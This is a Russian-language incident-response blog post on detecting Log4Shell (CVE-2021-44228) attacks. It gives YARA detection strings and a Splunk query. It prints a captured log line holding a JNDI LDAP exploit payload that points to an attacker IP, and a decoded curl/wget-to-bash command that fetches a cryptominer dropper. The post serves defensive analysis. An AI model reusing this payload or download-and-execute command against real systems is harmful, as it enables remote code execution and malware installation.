
CVE-2021-44228 DFIR заметки
По пути домой я начал получать первые сообщения об уязвимости #log4shell.
Уязвимость высокой степени серьезности (CVE-2021-44228), затрагивающая несколько версий утилиты Apache Log4j 2, была публично раскрыта через GitHub проекта 9 декабря 2021 года. Эта уязвимость, обнаруженная Чэнь Чжаоцзюнем из команды безопасности Alibaba Cloud, затрагивает Apache Log4j 2 версий с 2.0 по 2.14.1.
Сразу взялся за дело, когда вернулся домой. Splunk4tw как обычно.
После публикации первого proof-of-concept эксплойта на GitHub, злоумышленники начали сканировать интернет в поисках систем, уязвимых для этой удаленно эксплуатируемой уязвимости, не требующей аутентификации. Ниже вы увидите часть этих попыток сканирования и эксплуатации.
Первым делом я проверяю, не опубликовал ли кто-то первоначальное YARA-правило. Нашел его здесь https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b (спасибо Флориану Роту)
В нем упоминаются следующие строки для обнаружения:
strings:
$x1 = "${jndi:ldap:/"
$x2 = "${jndi:rmi:/"
$x3 = "${jndi:ldaps:/"
$x4 = "${jndi:dns:/"
Я не боюсь... давайте загрузим процессоры и сразу перейдем к делу с самым тяжелым Splunk-запросом.
index=* jndi:ldap* (updated query with index=* "{lower:l}${lower:d}a${lower:p}")
У меня есть срабатывания как в логах IIS, так и в журналах событий Windows (отредактировано), а также множество заблокированных попыток в логах брандмауэра...
IIS:

WINEVENTLOG:

Проверяю IP-адрес 45.155.205.233... Санкт-Петербург, Россия... какой сюрприз.

Найденная строка выглядит как классическая обфусцированная закодированная вредоносная строка. Давайте посмотрим, что она делает:
Давайте декодируем Base64 строку с помощью cyberchef
2021-12-10 13:26:16 [redacted] GET / - 443 - xxx.xx.xxx.xx ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNDUuMzUuMTk1LjYzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE0NS4zNS4xOTUuNjM6ODApfGJhc2g=} http://[redacted]:80/ 200 0 0 171

(curl -s 45.155.xx.233:xxxx/145.xx.195.63:80||wget -q -O- 45.xx.205.233:xxxx/145.xx.xxx.63:80)|bash
Curl... запустить shell-скрипт, bash... OMG. Начинаю догадываться, что будет делать эта мерзость....
Давайте выполним curl команду в песочнице:

368 строк кода. (запустите здесь, если хотите посмотреть весь скрипт --> https://reqbin.com/c-ipejxywd
Некоторые фрагменты:

И после завершения он даже очищает файлы логов... какой сюрприз:

По сути, он пытается установить вредоносное ПО под названием Kingsin, которое является криптомайнером. Цели — nix-системы. Убедитесь, что вы обновили свои системы, так как эксплойт, вероятно, будет использоваться для запуска самых разных полезных нагрузок.
Спасибо моим коллегам Мартейну из Umbrio и Робу [отредактировано] за пятничный вечер спарринга в WhatsApp по этому поводу. 00:09 пора спать.
#ОБНОВЛЕНИЯ и полезные ресурсы#
